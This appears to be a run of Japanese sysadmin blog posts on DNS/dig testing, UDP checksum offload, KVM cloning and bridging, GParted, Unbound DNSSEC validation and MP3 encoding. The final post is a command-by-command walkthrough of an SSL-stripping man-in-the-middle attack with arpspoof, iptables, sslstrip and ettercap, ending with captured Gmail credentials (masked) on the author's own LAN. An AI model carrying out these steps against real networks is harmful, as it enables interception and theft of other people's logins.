; <<>> DiG 9.7.1 <<>> @192.168.1.50 co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39887
;; flags: qr; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;co.jp. IN A

;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51

[root@hat4-vm ~]# dig @192.168.1.51 jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28399
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;jp. IN A

;; AUTHORITY SECTION:
jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600

;; Query time: 3 msec
;; SERVER: 192.168.1.51#53(192.168.1.51)
;; WHEN: Tue Jun 29 00:27:47 2010
;; MSG SIZE  rcvd: 73

[root@hat4-vm ~]# 

[root@hat4-vm ~]# dig @192.168.1.51 co.jp +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 co.jp +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53030
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;co.jp. IN A

;; AUTHORITY SECTION:
jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600

[root@hat4-vm ~]# dig @192.168.1.51 jp ns +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 jp ns +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 670
;; flags: qr aa; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:
;jp. IN NS

;; ANSWER SECTION:
jp. 86400 IN NS x.dns.jp.

;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51

;; Query time: 6 msec
;; SERVER: 192.168.1.51#53(192.168.1.51)
;; WHEN: Tue Jun 29 00:28:32 2010
;; MSG SIZE  rcvd: 56

[root@hat4-vm ~]# 
[root@hat4-vm ~]# dig @192.168.1.51 co.jp ns +norec

; <<>> DiG 9.7.1 <<>> @192.168.1.51 co.jp ns +norec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38325
;; flags: qr aa; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;co.jp. IN NS

;; AUTHORITY SECTION:
jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600

キャプチャ時にでる、UDP bad checksum エラー ( UDP checksum offload ) について

最近のNIC はNICでチェックサムを行っており、system(OS)パケットが送られた後にcheksum を行う

    ここでキャプチャ
system(OS) -----------------> NIC ---------->
        dummy checksum           本当の checksum


dummy checksum のときにキャプチャしているので、cheksum エラーがでる

送信で bad checksum が出ていて、受信で bad checksum でなかったら、
NIC の問題ではなく、上記が原因であることがほとんど。
受信は checksum 後にキャプチャしているから。
この場合は無視してOK

- 送信 ( Bad checksum )

    Source: 192.168.1.1 (192.168.1.1)
    Destination: 128.63.2.53 (128.63.2.53)
User Datagram Protocol, Src Port: 33978 (33978), Dst Port: domain (53)
    Source port: 33978 (33978)
    Destination port: domain (53)
    Length: 53
    Checksum: 0x8975 [incorrect, should be 0x29bb (maybe caused by "UDP checksum offload"?)]
        [Good Checksum: False]
        [Bad Checksum: True]

- 受信 ( Good checksum )

    Source: 192.5.5.241 (192.5.5.241)
    Destination: 192.168.1.1 (192.168.1.1)
User Datagram Protocol, Src Port: domain (53), Dst Port: 38562 (38562)
    Source port: domain (53)
    Destination port: 38562 (38562)
    Length: 837
    Checksum: 0xceb4 [correct]
        [Good Checksum: True]
        [Bad Checksum: False]

エラーはカウントされていない

root@arizona:~# LANG=C netstat -s
Ip:
    17708 total packets received
    0 forwarded
    0 incoming packets discarded
    17454 incoming packets delivered
    12100 requests sent out
Icmp:
    9 ICMP messages received
    0 input ICMP message failed.
    ICMP input histogram:
        destination unreachable: 9
    9 ICMP messages sent
    0 ICMP messages failed
    ICMP output histogram:
        destination unreachable: 9
IcmpMsg:
        InType3: 9
        OutType3: 9
Tcp:
    23 active connections openings
    3 passive connection openings
    10 failed connection attempts
    2 connection resets received
    2 connections established
    17115 segments received
    11879 segments send out
    0 segments retransmited
    0 bad segments received.
    165 resets sent
Udp:
    226 packets received
    9 packets to unknown port received.
    0 packet receive errors
    216 packets sent
UdpLite:
TcpExt:
    10 TCP sockets finished time wait in fast timer
    105 delayed acks sent
    2 packets directly queued to recvmsg prequeue.
    13717 packet headers predicted
    1499 acknowledgments not containing data payload received
    477 predicted acknowledgments
    1 connections reset due to early user close
IpExt:
    InMcastPkts: 52
    OutMcastPkts: 37
    InBcastPkts: 103
    InOctets: 16864327
    OutOctets: 10701647
    InMcastOctets: 9908
    OutMcastOctets: 7260
    InBcastOctets: 12159
root@arizona:~#

Ubuntu Server : KVM , how to make a clone VM

 root@arizona:~# cat /etc/lsb-release | grep -i desc

DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"

仮想マシンマネージャ -> クローン元のVM を右クリック -> cloneを選択



クローンVM の名前を決めて , clone をクリック


作成中


完了!


Gparted : フリーのパーティションリサイズソフト

パーティションマジックみたいなの探してたらフリー(GNU license) で gprated ってのがあるみたい。

下記のパーティションのリサイズ、作成ができる。

ext2/ext3/ext4, FAT16/FAT32, hfs/hfs+, linux-swap, NTFS, reiserfs/4, ufs, xfs file systems

http://gparted.sourceforge.net/

live CD で GNOME が起動し、GUI でリサイズできる。

実際に使ってみたが、自分の環境ではちゃんとリサイズできた。

Unbound : End-to-End DNSSEC w/ Firefox

Firefox に DNSSEC validation のプラグインがあるので使ってみた。

- unbound の準備

ITAR の準備ができている状態とする

root@arizona:/etc/unbound# unbound -v
[1275843653] unbound[1701:0] notice: Start of unbound 1.4.1.

root@arizona:/etc/unbound# egrep "trust-anchor-file" unbound.conf | grep -v "#"
         trust-anchor-file: "/etc/unbound/anchors.mf"

- DNSSEC クエリの解決ができるかチェック

ad bit が flag にたっていれば、OK

root@arizona:/etc/unbound# dig @127.1 www.isc.org +dnssec +multiline

; <<>> DiG 9.7.0-P1 <<>> @127.1 www.isc.org +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1402
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 5, ADDITIONAL: 9

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;www.isc.org.           IN A

;; ANSWER SECTION:
www.isc.org.            240 IN A 149.20.64.42
www.isc.org.            240 IN RRSIG A 5 3 600 2010070523333


DNSSECに対応していないFQDN に dig すると ad ビットは立たない

root@arizona:/etc/unbound# dig @127.1 www.google.com +dnssec +multiline

; <<>> DiG 9.7.0-P1 <<>> @127.1 www.google.com +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22658
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;www.google.com.                IN A


unbound-host  -C コンフィグファイル FQDN -v でも確認できる。

root@arizona:/etc/unbound# unbound-host -C unbound.conf www.isc.org -v
[1275844036] libunbound[1821:0] notice: init module 0: validator
[1275844036] libunbound[1821:0] notice: init module 1: iterator
www.isc.org has address 149.20.64.42 (secure)
www.isc.org has IPv6 address 2001:4f8:0:2::d (secure)
www.isc.org has no mail handler record (secure)
root@arizona:/etc/unbound#

root@arizona:/etc/unbound# unbound-host -C unbound.conf www.google.com -v
[1275844044] libunbound[1860:0] notice: init module 0: validator
[1275844044] libunbound[1860:0] notice: init module 1: iterator
www.google.com is an alias for www.l.google.com. (insecure)
www.l.google.com has address 66.249.89.104 (insecure)
www.l.google.com has address 66.249.89.99 (insecure)
www.l.google.com has no IPv6 address (insecure)
www.l.google.com has no mail handler record (insecure)

- Firefox 3.6.3 に DNSSEC valitation の add-on を追加 

add-on のダウンロード

https://addons.mozilla.org/en-US/firefox/addon/64247/

使い方

http://www.dnssec-validator.cz/

Firefox -> ツール -> アドオン から DNSSEC 対応の キャッシュサーバ ( 今回は unbound ) の IP を指定する



DNSSECで名前解決できる www.isc.org にアクセス

URLバーに、DNSSEC の検証ができたかアイコンが表示される。



赤色だと、DNSSEC 対応ドメインだけど、IPアドレスが変わってる or DNSSEC の signature が壊れてる。


root@arizona:~# unbound-host -C /etc/unbound/unbound.conf www.rhybar.cz -v
[1275845463] libunbound[4671:0] notice: init module 0: validator
[1275845463] libunbound[4671:0] notice: init module 1: iterator
www.rhybar.cz has address 217.31.205.50 (BOGUS (security failure))
validation failure : signature crypto failed from 194.0.13.1 for key rhybar.cz. while building chain of trust
www.rhybar.cz has IPv6 address 2001:1488:0:3::2 (BOGUS (security failure))
validation failure : signature crypto failed from 194.0.13.1 for key rhybar.cz. while building chain of trust
www.rhybar.cz has no mail handler record (BOGUS (security failure))
validation failure : signature crypto failed from 194.0.12.1 for key rhybar.cz. while building chain of trust

Firefox -> キャッシュサーバでキャプチャ

DO bit を有効にして、問い合わせてる。

    Questions: 1
    Answer RRs: 0
    Authority RRs: 0
    Additional RRs: 1
    Queries
        www.rhybar.cz: type A, class IN
            Name: www.rhybar.cz
            Type: A (Host address)
            Class: IN (0x0001)
    Additional records
        : type OPT
            Name:
            Type: OPT (EDNS0 option)
            UDP payload size: 4096
            Higher bits in extended RCODE: 0x0
            EDNS0 version: 0
            Z: 0x8000
                Bit 0 (DO bit): 1 (Accepts DNSSEC security RRs)
                Bits 1-15: 0x0 (reserved)
            Data length: 0


Ubuntu: encode n' play MP3 w/ Rhythmbox

root@arizona:~# cat /etc/lsb-release | grep -i desc
DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"

root@arizona:~# apt-get install ubuntu-restricted-extras

root@arizona:~# apt-get install lame


アプリケーション -> サウンドとビデオ -> Rhythmbox を起動

"MP3のプラグインをインストール" が表示されるので、クリックしてインストール



編集 -> 設定 -> ミュージックプレイヤーの設定 のフォーマットをMP3 にする。



- MP3 の作成

CDアイコンの すべてのトラックをライブラリにコピー でMP3にできる。



Ubuntu server : KVM , how to create a network bridge

root@arizona:~# cat /etc/lsb-release | grep -i description
DISTRIB_DESCRIPTION="Ubuntu 10.04 LTS"

root@arizona:~# uname -r
2.6.32-22-server


デフォルトで、KVMゲストは NAT環境で動く ( virtual network )
                                    
                     NAT           virtual network
Internet ---eth0  KVM host ----------VMs

eth0: 192.168.1.0/24
virbr0 ( virtual network) : 192.168.122.0/24 ( VMのネットワーク )

これをブリッジ形式にして、VMのネットワークを KVM ホストと同じネットワークにする。

eth0: 192.168.1.0/24
br0 ( network bridge ) : 192.168.1.0/24

root@arizona:~# apt-get install bridge-utils

oot@arizona:~# /etc/init.d/networking stop

ネットワークの設定変更。br0 を作成し、eth0 にブリッジさせる。

- before

root@arizona:~# egrep -v "^#" /etc/network/interfaces.org

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.1.150
netmask 255.255.255.0
gateway 192.168.1.254

root@arizona:~#

- after

root@arizona:~# egrep -v "^#" /etc/network/interfaces
auto lo
iface lo inet loopback

auto eth0
iface eth0 inet manual

auto br0
iface br0 inet static
        address 192.168.1.150
        network 192.168.1.0
        netmask 255.255.255.0
        broadcast 192.168.1.255
        gateway 192.168.1.254
        bridge_ports eth0
        bridge_stp off
        bridge_fd 0
        bridge_maxwait 0

root@arizona:~#

root@arizona:~# /etc/init.d/networking start

ネットワークの設定かえて、/etc/init.d/networking restart だったらなんかうまくいかなかった。
stop -> start でやったほうがよさげ。

- before

root@arizona:~# LANG=C ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1d:60:77:a1:38
          inet addr:192.168.1.150  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::21d:60ff:fe77:a138/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:8028 errors:0 dropped:0 overruns:0 frame:0
          TX packets:11773 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2756850 (2.7 MB)  TX bytes:10669402 (10.6 MB)
          Interrupt:26 Base address:0xc000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:40 errors:0 dropped:0 overruns:0 frame:0
          TX packets:40 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:2360 (2.3 KB)  TX bytes:2360 (2.3 KB)

virbr0    Link encap:Ethernet  HWaddr 3e:0d:65:a8:fe:e7
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          inet6 addr: fe80::3c0d:65ff:fea8:fee7/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:28 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:4760 (4.7 KB)


- after

br0 ができた。br0 は eth0 にブリッジされている。

virbr0 はNAT
br0 は ブリッジ ( eth0 にブリッジされる )

root@arizona:/etc/network# LANG=C ifconfig 
br0       Link encap:Ethernet  HWaddr 00:1d:60:77:a1:38  
          inet addr:192.168.1.150  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::21d:60ff:fe77:a138/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:45 errors:0 dropped:0 overruns:0 frame:0
          TX packets:54 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:4244 (4.2 KB)  TX bytes:6589 (6.5 KB)

eth0      Link encap:Ethernet  HWaddr 00:1d:60:77:a1:38  
          inet6 addr: fe80::21d:60ff:fe77:a138/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:484 errors:0 dropped:0 overruns:0 frame:0
          TX packets:576 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:208113 (208.1 KB)  TX bytes:98061 (98.0 KB)
          Interrupt:26 Base address:0xc000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:56 errors:0 dropped:0 overruns:0 frame:0
          TX packets:56 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:5121 (5.1 KB)  TX bytes:5121 (5.1 KB)

virbr0    Link encap:Ethernet  HWaddr 2a:3e:0f:f6:b2:02  
          inet addr:192.168.122.1  Bcast:192.168.122.255  Mask:255.255.255.0
          inet6 addr: fe80::283e:fff:fef6:b202/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:30 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 B)  TX bytes:4575 (4.5 KB)

仮想マシンにネットワークを追加するときに、br0 が追加できるようになる。



VM に br0 を追加し、VMを起動したあとの ifconfig

- VM の ifconfig 。 KVMホストの eth0 と同じネットワークになった。

[root@localhost ~]# ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 52:54:00:0E:79:80
          inet addr:192.168.1.6  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::5054:ff:fe0e:7980/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:47 errors:0 dropped:0 overruns:0 frame:0
          TX packets:86 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:6714 (6.5 KiB)  TX bytes:13514 (13.1 KiB)
          Interrupt:10 Base address:0xe000

Analyze ( strip ? ) SSL Traffic with sslstrip , arpspoof and ettercap

SSL通信の解読に ssldump を使ってたけど、なんか他にいいツールないかなーとさがしていた。。。
sslstrip , arpspoof , ettercap を使ってSSL通信を解読してみた。

SSLクライアント: 192.168.1.2 ( Windows )
sslstrip , arpspoof , ettercap マシン: 192.168.1.3 ( BackTrack Linux 4 final )

Internet --- Router 1.254  --- 1.3 Windows
                                   --- 1.2  eth0  BackTrack Linux 

[ sslstrip マシン ]

下記2行のコメントを外す

- ethercap の設定ファイルを修正

ettercap  NG-0.7.3 - A multipurpose sniffer/content filter for man in the middle attacks


root@bt:# vi /etc/etter.conf

   redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

- forwarding を有効にする

root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@bt:~#
root@bt:~# cat /proc/sys/net/ipv4/ip_forward
1


- arpspoof を実行

arpspoof -t ターゲットのIP デフォルト  ゲートウェイ

root@bt:~# arpspoof -i eth0 -t 192.168.1.2 192.168.1.254


OPTIONS
       -i interface
              Specify the interface to use.

       -t target
              Specify a particular host to ARP poison (if not specified, all  hosts  on
              the LAN).

       host   Specify  the  host  you  wish to intercept packets for (usually the local
              gateway).


- あて先ポートが 80 を 10000 ポートにリダイレクト ( sslstrip が 10000 番ポートでリッスンしていて、SSLトラフィックを strip する )

root@bt:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

sslstrip 起動

root@bt:~# sslstrip -a -f -k

sslstrip 0.6 by Moxie Marlinspike running...

- sslstrip は 10000番ポートでリッスン

root@bt:~# lsof -i:10000
COMMAND   PID USER   FD   TYPE DEVICE SIZE NODE NAME
sslstrip 6188 root    4u  IPv4  23821       TCP *:webmin (LISTEN)


root@bt:~# sslstrip --help

sslstrip 0.6 by Moxie Marlinspike
Usage: sslstrip

Options:
-w , --write= Specify file to log to (optional).
-p , --post                       Log only SSL POSTs. (default)
-s , --ssl                        Log all SSL traffic to and from server.
-a , --all                        Log all SSL and HTTP traffic to and from server.
-l , --listen=        Port to listen on (default 10000).
-f , --favicon                    Substitute a lock favicon on secure requests.
-k , --killsessions               Kill sessions in progress.
-h                                Print this help message.

- パケットキャプチャ

root@bt:~# ettercap -T -q -i eth0


Windows ( IE ) で、gmail にログイン。

ユーザ名、パスワードがみえる。  ( sslsttrip マシン )

root@bt:~# ettercap -T -q -i eth0

HTTP : 66.249.89.104:443 -> USER: xxxxx@gmail.com  PASS: xxxxx  INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx
HTTP : 66.249.89.104:80 -> USER: xxxxx@gmail.com  PASS: xxxxx  INFO: http://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=https://mail.google.com/mail/?ui=html&zy=l&bsv=xxxxxx

html 形式でみることもできる ( -V html )

root@bt:~# ettercap -T -i eth0 -V html
HTTP/1.1 200 OK
Cache-Control: public, max-age=604800
Expires: Thu, 10 Jun 2010 17:34:41 GMT
Date: Thu, 03 Jun 2010 17:34:41 GMT
Refresh: 0;URL=https://mail.google.com/mail/
Content-Type: text/html; charset=ISO-8859-1
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Length: 234
Server: GSE

GET /mail/ HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, */*
Accept-Language: ja-JP



-V, --visual
              Use this option to set the visualization method for the  packets
              to be displayed.

              FORMAT may be one of the following:



              hex    Print the packets in hex format.

                     example:

                     the string  "HTTP/1.1 304 Not Modified"  becomes:

                     0000:  4854  5450 2f31 2e31 2033 3034 204e 6f74  HTTP/1.1
                     304 Not
                     0010: 204d 6f64 6966 6965 64                    Modified


              ascii  Print only "printable" characters, the  others  are  dis-
                     played as dots '.'


              text   Print  only  the "printable" characters and skip the oth-
                     ers.


              ebcdic Convert an EBCDIC text to ASCII.


              html   Strip all the html tags from the text.  A  tag  is  every
                     string between < and >.

                     example:

                     ,  but  the  following
                     will not be displayed.

                     This is the title, but the following  will  not  be  dis-
                     played.


              utf8   Print  the  packets  in  UTF-8  format. The encoding used
                     while  performing  the  conversion  is  declared  in  the
                     etter.conf(5) file.

トリックは中間者攻撃 ( Man in The Middle Attack ) で SSL通信をぬすんで、解読してる。